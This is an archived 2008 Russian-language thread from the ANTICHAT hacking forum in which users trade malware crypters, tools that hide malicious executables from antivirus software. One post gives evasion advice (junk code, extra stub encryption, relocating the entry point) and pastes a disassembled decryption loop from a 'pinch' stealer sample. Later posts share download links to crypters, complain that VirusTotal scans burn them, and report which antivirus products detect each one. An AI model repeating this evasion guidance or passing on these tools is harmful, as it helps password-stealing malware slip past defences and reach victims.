ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.03.2008, 06:42
|
|
Участник форума
Регистрация: 24.01.2008
Сообщений: 110
Провел на форуме:
359408
Репутация:
209
|
|
Сообщение от 12usver12
to Killerkod когда ужо начнешь крипторы чистить ?  крипторы не джуниоры здесь так просто не обайдешься перестановкой инструкций
тут нужно добавлять серьезные извращения чтоб эвристик не проходил побольше мусора ну можно доп криптовку стаба воткнуть и перекинуть ОЕР в другое место можно использовать алгоритм и способ крипта как в крипторе AssassinCryptor v1.3
Код:
131780D2 57 PUSH EDI ; pinch.13141200
131780D3 8B1F MOV EBX, DWORD PTR DS:[EDI]
131780D5 8B4F 04 MOV ECX, DWORD PTR DS:[EDI+4]
131780D8 68 B979379E PUSH 9E3779B9
131780DD 5A POP EDX
131780DE 42 INC EDX
131780DF 8BC2 MOV EAX, EDX
131780E1 48 DEC EAX
131780E2 C1E0 05 SHL EAX, 5
131780E5 BF 20000000 MOV EDI, 20
131780EA 4A DEC EDX
131780EB 8BEB MOV EBP, EBX
131780ED C1E5 04 SHL EBP, 4
131780F0 2BCD SUB ECX, EBP
131780F2 8B6E 08 MOV EBP, DWORD PTR DS:[ESI+8]
131780F5 33EB XOR EBP, EBX
131780F7 2BCD SUB ECX, EBP
131780F9 8BEB MOV EBP, EBX
131780FB C1ED 05 SHR EBP, 5
131780FE 33E8 XOR EBP, EAX
13178100 2BCD SUB ECX, EBP
13178102 2B4E 0C SUB ECX, DWORD PTR DS:[ESI+C]
13178105 8BE9 MOV EBP, ECX
13178107 C1E5 04 SHL EBP, 4
1317810A 2BDD SUB EBX, EBP
1317810C 8B2E MOV EBP, DWORD PTR DS:[ESI]
1317810E 33E9 XOR EBP, ECX
13178110 2BDD SUB EBX, EBP
13178112 8BE9 MOV EBP, ECX
13178114 C1ED 05 SHR EBP, 5
13178117 33E8 XOR EBP, EAX
13178119 2BDD SUB EBX, EBP
1317811B 2B5E 04 SUB EBX, DWORD PTR DS:[ESI+4]
1317811E 2BC2 SUB EAX, EDX
13178120 4F DEC EDI
13178121 ^ 75 C8 JNZ SHORT pinch.131780EB
13178123 5F POP EDI
13178124 891F MOV DWORD PTR DS:[EDI], EBX
13178126 894F 04 MOV DWORD PTR DS:[EDI+4], ECX
этот цикл повторяеться много кратно и так много раз пока в конечном итоге не получишь раскриптовааный код вроде усе
|
|
|
18.03.2008, 06:55
|
|
Познающий
Регистрация: 02.06.2007
Сообщений: 39
Провел на форуме:
553176
Репутация:
15
|
|
сообщение от AlexDee
Гыгы ну ты и ламеррр!!! во нубья то развелось
а терь поясни в чём я не прав ?
ламер скорее ты так как если ты не знаешь что после того как их проверяют на вирустотале они начинают политься то тогда здесь ламеров много и ты тогда форумом ошибся !
да в большинстве я нуб и что с того ?
но в этой теме не один раз выкладывали криптор и не один раз просили не проверять на этом вирустотале ! а кто то видно читать не умеет берёт и палит криптор  пару дней и писец !
а по твоим словам я смотрю ты профи офигенный !
может ты хочеш сказать что всякие полудурки типо тебя на вирустотале не проверяют и что он начинает полится не из за вирустотала ?
если я в чём та не прав то выскажись ! |
|
|
|
18.03.2008, 17:08
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
уже задумываюсь о приватном крипторе раньше был от Васьки неплохой вроде а щас он паблик есть что нить подобное?
Последний раз редактировалось xdx; 18.03.2008 в 17:18..
|
|
|
|
18.03.2008, 17:18
|
|
Banned
Регистрация: 17.03.2008
Сообщений: 22
Провел на форуме:
140962
Репутация:
5
|
|
Его юзайте!shawnix самый крутой кодер
|
|
|
|
19.03.2008, 07:52
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Viruslist: http://img3.imagebanana.com/img/ggb22soo/VirusTotalKostenloseronlineVirenundM.png
http://rapidshare.com/files/97955583/White_Widdow_-_Crypter_v_1.5.rar
Файл не проверен! |
|
|
|
19.03.2008, 08:33
|
|
Участник форума
Регистрация: 24.01.2008
Сообщений: 110
Провел на форуме:
359408
Репутация:
209
|
|
я бы не юзал такой склейки и вируса там конечно нет но стаб (215*552 байт)
это уж слишком а так вполне нормальный криптор на дельфине нечем не пакован
для дальнейшего анализа нужно тестить послушаем мнение большенства
|
|
|
|
19.03.2008, 10:48
|
|
Познающий
Регистрация: 15.02.2006
Сообщений: 64
Провел на форуме:
242065
Репутация:
100
|
|
SharK_Crypter 0.1
|
|
|
|
19.03.2008, 15:31
|
|
Познающий
Регистрация: 02.03.2008
Сообщений: 38
Провел на форуме:
85102
Репутация:
8
|
|
Сообщение от Isis
Viruslist: http://img3.imagebanana.com/img/ggb22soo/VirusTotalKostenloseronlineVirenundM.png
http://rapidshare.com/files/97955583/White_Widdow_-_Crypter_v_1.5.rar
Файл не проверен!
палица каспером как Trojan.Win32.Small.abz
|
|
|
|
19.03.2008, 15:51
|
|
Познающий
Регистрация: 02.03.2008
Сообщений: 38
Провел на форуме:
85102
Репутация:
8
|
|
каспер не палит остальные не знаю
http://rapidshare.com/files/99231689/RogueCrypt_v1.0.rar.html |
|
|
|
19.03.2008, 16:00
|
|
Познающий
Регистрация: 15.02.2006
Сообщений: 64
Провел на форуме:
242065
Репутация:
100
|
|
Hacking.gvu.cc Crypter
Hacking.gvu.cc Crypter
DL Link:
http://rapidshare.com/files/100664138/Hacking.gvu.cc_Crypter.exe.html |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
